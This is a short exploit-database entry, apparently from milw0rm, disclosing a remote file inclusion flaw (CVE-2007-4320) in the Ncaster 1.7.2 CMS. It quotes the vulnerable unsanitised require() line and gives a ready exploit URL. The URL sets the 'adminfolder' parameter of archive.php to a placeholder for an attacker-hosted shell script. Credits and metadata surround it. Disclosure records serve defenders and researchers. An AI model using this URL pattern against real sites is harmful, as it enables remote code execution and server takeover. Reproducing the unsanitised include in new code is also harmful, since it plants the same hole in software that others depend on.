Ncaster 1.7.2 - 'archive.php' Remote File Inclusion

Author: k1n9k0ng
type: webapps
platform: php
port: 
date_added: 2007-08-08 
date_updated:  
verified: 1 
codes: OSVDB-36426;CVE-2007-4320 
tags: 
aliases:  
screenshot_url:  
application_url: 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]